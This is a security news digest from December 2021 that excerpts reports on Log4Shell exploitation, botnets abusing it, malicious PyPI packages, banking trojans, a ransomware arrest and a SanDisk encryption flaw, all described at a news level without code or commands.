December 13, 2021

Fortify Security Team
Dec 13, 2021

Title: The U.S. CISA added 13 new vulnerabilities to the Known Exploited Vulnerabilities Catalog, including Apache Log4Shell Log4j and Fortinet FortiOS issues.

Date Published: December 13, 2021

Excerpt: “The CVE-2021-44228 flaw made the headlines last week, after Chinese security researcher p0rz9 publicly disclosed a Proof-of-concept exploit for the critical remote code execution zero-day vulnerability (aka Log4Shell) that affects the Apache Log4j Java-based logging library. The impact of the issue is devastating, thousands of organizations worldwide are potentially exposed to attacks and security experts are already reported exploitation attempts in the wild. CISA also warns of a recently disclosed arbitrary file download vulnerability in FortiOS, tracked as CVE-2021-44168, that is actively exploited.”

Title: Log4j Flaw: Attackers Are Making Thousands of Attempts to Exploit This Severe Vulnerability

Date Published: December 13, 2021

Excerpt: “Meanwhile, cybersecurity researchers at Sophos have warned that they’ve detected hundreds of thousands of attempts to remotely execute code using the Log4j vulnerability in the days since it was publicly disclosed, along with scans searching for the vulnerability. There are already active examples of attackers attempting to leverage Log4j vulnerabilities to install cryptocurrency-mining malware, while there also reports of several botnets, including Mirai, Tsunami, and Kinsing, that are making attempts to leverage it. Researchers at Microsoft have also warned about attacks attempting to take advantage of Log4j vulnerabilities, including a range of crypto mining malware, as well as active attempts to install Cobalt Strike on vulnerable systems, something that could allow attackers to steal usernames and passwords.”

Title: Two Linux Botnets Already Exploit log4shell Flaw in Log4j

Date Published: December 13, 2021

Excerpt: “The attackers used a uy top-level domain for the C2 infrastructure, which is uncommon. The Muhstik variant used in the attacks includes a backdoor module, ldm, which adds an SSH backdoor public key to allow remote connections to the server. After the public key is added to the ~/.ssh/authorized_keys file, the attacker can directly log into the remote server without password authentication. Experts pointed out that Muhstik uses the TOR network for its reporting mechanism. “Before accessing the TOR network, Muhstik queries relay.l33t-ppl.inf through some publicly available DoH services. During this process, a number of DNS requests are generated.” reads the post published by NetLab 360.”

Title: Hackers Start Pushing Malware in Worldwide log4shell Attacks

Date Published: December 12, 2021

Excerpt: “As soon as the vulnerability was released, we saw threat actors exploiting the Log4Shell vulnerability to execute shell scripts that download and install various cryptominers, as shown below. The threat actors behind the Kinsing backdoor and cryptomining botnet are heavily abusing the Log4j vulnerability with Base64 encoded payloads that have the vulnerable server download and execute shell scripts. This shell script will remove competing malware from the vulnerable device and then download and install the Kinsing malware, which will begin mining for cryptocurrency.”

Title: Arrest in Romania of a Ransomware Affiliate Scavenging for Sensitive Data

Date Published: December 13, 2021

Excerpt: “Romanian law enforcement authorities arrested a ransomware affiliate suspected of hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide, including a large Romanian IT company with clients from the retail, energy, and utilities sectors. The 41-year-old Romanian national was arrested Monday morning at his home in Craiova, Romania, by the DIICOT (the Romanian Directorate for Investigating Organized Crime and Terrorism) and judicial police officers, on suspicions of unauthorized access to a computer system, unauthorized transfer of computer data, illegal interception of a computer transmission, and blackmail.”

Title: Malicious Pypi Packages with over 10,000 Downloads Taken Down

Date Published: December 13, 2021

Excerpt: “The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines. These malicious packages are estimated to have generated over 10,000 downloads and mirrors put together, according to the researchers’ report. This week, Andrew Scott, a developer and senior product manager at Palo Alto Networks, reported discovering three malicious Python packages on the PyPI open source registry.”

Title: TinyNuke Banking Malware Targets French Entities

Date Published: December 13, 2021

Excerpt: “Proofpoint identified multiple recent campaigns leveraging invoice-themed lures to distribute the uncommonly observed TinyNuke malware. The activity marks a stark reappearance of this threat, which has not been seen with regularity since 2018. The campaigns target hundreds of customers in various industries including manufacturing, technology, construction, and business services. The campaigns use French language lures with invoice or other financial themes, and almost exclusively target French entities and companies with operations in France.”

Title: Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan

Date Published: December 13, 2021

Excerpt: “Infection chains associated with the multi-purpose Qakbot malware have been broken down into “distinct building blocks,” an effort that Microsoft said will help to proactively detect and block the threat in an effective manner. The Microsoft 365 Defender Threat Intelligence Team dubbed Qakbot a “customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it.” Qakbot is believed to be the creation of a financially motivated cybercriminal threat group known as Gold Lagoon. It is a prevalent information-stealing malware that, in recent years, has become a precursor to many critical and widespread ransomware attacks, offering a malware installation-as-a-service that enables many campaigns.”

Title: US, Australia and Japan Stump up for Subsea Cable between Nauru, Kiribati and Federated States of Micronesia

Date Published: December 12, 2021

Excerpt: “The United States, Australia, and Japan have said they will provide funding for a new subsea cable to connect the Pacific island nations of Nauru, Kiribati, and Federated States of Micronesia (FSM). The new cable will connect the island containing the capital of Kiribati with Nauru and the island of Kosrae in FSM, before connecting with the Hantru-1 cable at the island of Pohnpei in FSM. A joint statement between the six nations said the cable would provide better connectivity to 100,000 people across the three Pacific nations.”

Title: Western Digital Sandisk Secureaccess Flaws Allow Brute Force and Dictionary Attacks

Date Published: December 11, 2021

Excerpt: “The SanDisk SecureAccess software, now rebranded SanDisk PrivateAccess, allows storing and protecting critical and sensitive files on SanDisk USB flash drives. The access to the user’s private vault is protected by a personal password, and all the files are automatically encrypted. According to the vendor, SanDisk SecureAccess version 3.02 was using a one-way cryptographic hash with a predictable salt, This means that the software is vulnerable to dictionary attacks. The software also uses a password hash with insufficient computational effort, as a consequence, an attacker can brute force user passwords leading to unauthorized access to user data.”

Recent Posts

June 10, 2022

Title: Bizarre Ransomware Sells Decryptor on Roblox Game Pass Store Date Published: June 9, 2022 Excerpt: “A new ransomware is taking the unusual approach of...

June 9, 2022

Title: New Symbiote Malware Infects all Running Processes on Linux Systems Date Published: June 9, 2022 Excerpt: “A newly discovered Linux malware known...

June 8, 2022

Title: Surfshark, ExpressVPN pull out of India Over Data Retention Laws Date Published: June 7, 2022 Excerpt: “Surfshark announced today they are shutting down...

June 6, 2022

Title: Italian City of Palermo Shuts Down all Systems to Fend off Cyberattack Date Published: June 6, 2022 Excerpt: “The municipality of Palermo in...

June 3, 2022

Title: Critical Atlassian Confluence Zero-Day Actively Used in Attack Date Published: June 2, 2022 Excerpt: “Hackers are actively exploiting a new Atlassian...

June 2, 2022

Title: Conti Ransomware Targeted Intel Firmware for Stealthy Attacks Date Published: June 2, 2022 Excerpt: “Researchers analyzing the leaked chats of the...

June 1, 2022

Title: Ransomware Attacks Need Less Than Four Days to Encrypt Systems Date Published: June 1, 2022 Excerpt: “The duration of ransomware attacks in 2021...